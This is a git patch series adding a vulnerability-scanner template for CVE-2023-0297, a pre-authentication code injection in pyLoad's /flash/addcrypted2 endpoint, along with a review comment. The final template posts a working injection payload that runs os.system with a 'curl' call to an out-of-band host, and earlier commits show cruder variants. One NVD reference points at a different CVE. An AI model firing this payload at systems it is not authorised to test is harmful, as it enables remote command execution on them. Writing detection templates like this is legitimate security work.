From ac84955ae66672aec9570e488933181bccbdaf9e Mon Sep 17 00:00:00 2001
From: "alert('0-0')" <49817411+MrHarshvardhan@users.noreply.github.com>
Date: Tue, 4 Jul 2023 18:21:35 +0530
Subject: [PATCH 1/5] CVE-2023-0297.yaml
---
http/cves/2023/CVE-2023-0297.yaml | 21 +++++++++++++++++++++
1 file changed, 21 insertions(+)
create mode 100644 http/cves/2023/CVE-2023-0297.yaml
diff --git a/http/cves/2023/CVE-2023-0297.yaml b/http/cves/2023/CVE-2023-0297.yaml
new file mode 100644
index 00000000000..6618e77f1c8
--- /dev/null
+++ b/http/cves/2023/CVE-2023-0297.yaml
@@ -0,0 +1,21 @@
+id: flash-addcrypted2-rce
+info:
+ name: Flash Addcrypted2 Remote Code Execution
+ author: MrHarshvardhan
+ severity: high
+ description: |
+ Template to detect the Flash Addcrypted2 Remote Code Execution vulnerability.
+ reference:
+ - https://www.exploit-db.com/exploits/51532
+requests:
+ - method: GET
+ path:
+ - /flash/addcrypted2
+ attacks:
+ - raw:
+ - 'jk=pyimport%20os;os.system("CMD_PLACEHOLDER");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa'
+ - 'CMD_PLACEHOLDER: "{cmd}"'
+ predicates:
+ - type: status
+ status:
+ - 200
From 276497b314108b9536645b38353f01f6d8e2ee63 Mon Sep 17 00:00:00 2001
From: "alert('0-0')" <49817411+MrHarshvardhan@users.noreply.github.com>
Date: Tue, 4 Jul 2023 18:28:32 +0530
Subject: [PATCH 2/5] CVE-2023-0297.yaml
---
http/cves/2023/CVE-2023-0297.yaml | 16 ++++++++--------
1 file changed, 8 insertions(+), 8 deletions(-)
diff --git a/http/cves/2023/CVE-2023-0297.yaml b/http/cves/2023/CVE-2023-0297.yaml
index 6618e77f1c8..7650a9483d5 100644
--- a/http/cves/2023/CVE-2023-0297.yaml
+++ b/http/cves/2023/CVE-2023-0297.yaml
@@ -1,20 +1,20 @@
-id: flash-addcrypted2-rce +id: python-code-injection info: - name: Flash Addcrypted2 Remote Code Execution + name: Python Code Injection author: MrHarshvardhan - severity: high + severity: medium description: | - Template to detect the Flash Addcrypted2 Remote Code Execution vulnerability. - reference: - - https://www.exploit-db.com/exploits/51532 + Template to detect Python code injection vulnerabilities. + reference: xxx requests: - method: GET path: - /flash/addcrypted2 attacks: - raw: - - 'jk=pyimport%20os;os.system("CMD_PLACEHOLDER");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' - - 'CMD_PLACEHOLDER: "{cmd}"' + headers: + Content-type: application/x-www-form-urlencoded + body: jk=pyimport%20os;os.system("{{cmd}}");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa predicates: - type: status status:
From def35f6b48f3b2b0d0d370886594bf5253276c6f Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Thu, 6 Jul 2023 16:00:31 +0530
Subject: [PATCH 3/5] re-wrote template
---
http/cves/2023/CVE-2023-0297.yaml | 69 ++++++++++++++++++++++---------
1 file changed, 49 insertions(+), 20 deletions(-)
diff --git a/http/cves/2023/CVE-2023-0297.yaml b/http/cves/2023/CVE-2023-0297.yaml
index 7650a9483d5..0a5381e5f88 100644
--- a/http/cves/2023/CVE-2023-0297.yaml
+++ b/http/cves/2023/CVE-2023-0297.yaml
@@ -1,21 +1,50 @@
-id: python-code-injection -info: - name: Python Code Injection - author: MrHarshvardhan - severity: medium +id: CVE-2023-0297 + +info: + name: PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE) + author: MrHarshvardhan,DhiyaneshDk + severity: critical description: | - Template to detect Python code injection vulnerabilities. - reference: xxx -requests: - - method: GET - path: - - /flash/addcrypted2 - attacks: - - raw: - headers: - Content-type: application/x-www-form-urlencoded - body: jk=pyimport%20os;os.system("{{cmd}}");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa - predicates: - - type: status - status: - - 200 + Code Injection in GitHub repository pyload/pyload prior to 0.5.0b3.dev31. + reference: + - https://www.exploit-db.com/exploits/51532 + - https://huntr.dev/bounties/3fd606f7-83e1-4265-b083-2e1889a05e65/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-1058 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-0297 + cwe-id: CWE-94 + cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + shodan-query: html:"pyload" + tags: huntr,cve,cve2023,rce,pyload,oast + +variables: + cmd: "curl {{interactsh-url}}" + +http: + - raw: + - | + GET /flash/addcrypted2 HTTP/1.1 + Host: {{Hostname}} + + - | + POST /flash/addcrypted2 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + jk=pyimport+os%3Bos.system%28%22{{cmd}}%22%29%3Bf%3Dfunction+f2%28%29%7B%7D%3B&packages=YyVIbzmZ&crypted=ZbIlxWYe&passwords=oJFFUtTw + + matchers-condition: and + matchers: + - type: word + part: body_1 + words: + - 'JDownloader' + + - type: word + part: interactsh_protocol + words: + - "dns"
From 03b1f956c861b50426e05b7274374b48b6c2df8a Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Thu, 6 Jul 2023 16:04:40 +0530
Subject: [PATCH 4/5] trail space fix
---
http/cves/2023/CVE-2023-0297.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
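Review bot: The last `reference` entry in the new `info` block, `https://nvd.nist.gov/vuln/detail/CVE-2022-1058`, points at a different CVE than the template's own `cve-id: CVE-2023-0297`; unless that cross-reference is deliberate it should read `- https://nvd.nist.gov/vuln/detail/CVE-2023-0297`. The `info` block also carries no `remediation` field, and since the description already pins the fixed version, `remediation: Upgrade pyload to 0.5.0b3.dev31 or later.` would be consistent with it. It is worth stating in the description that the check is intrusive: the `cmd` variable executes `curl` on the scanned host, and the second matcher only fires on an out-of-band DNS interaction (`interactsh_protocol` / `dns`), so a vulnerable host without outbound DNS resolution produces no finding.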
diff --git a/http/cves/2023/CVE-2023-0297.yaml b/http/cves/2023/CVE-2023-0297.yaml
index 0a5381e5f88..1479bbda503 100644
--- a/http/cves/2023/CVE-2023-0297.yaml
+++ b/http/cves/2023/CVE-2023-0297.yaml
@@ -1,6 +1,6 @@ id: CVE-2023-0297 -info: +info: name: PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE) author: MrHarshvardhan,DhiyaneshDk severity: critical
From 0a0525fa67306b803d440eeeac320a528e39862b Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Fri, 7 Jul 2023 10:38:10 +0530
Subject: [PATCH 5/5] Update CVE-2023-0297.yaml
---
http/cves/2023/CVE-2023-0297.yaml | 1 +
1 file changed, 1 insertion(+)
diff --git a/http/cves/2023/CVE-2023-0297.yaml b/http/cves/2023/CVE-2023-0297.yaml
index 1479bbda503..9560e9884ab 100644
--- a/http/cves/2023/CVE-2023-0297.yaml
+++ b/http/cves/2023/CVE-2023-0297.yaml
@@ -18,6 +18,7 @@ info: cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:* metadata: max-request: 2 + verified: true shodan-query: html:"pyload" tags: huntr,cve,cve2023,rce,pyload,oast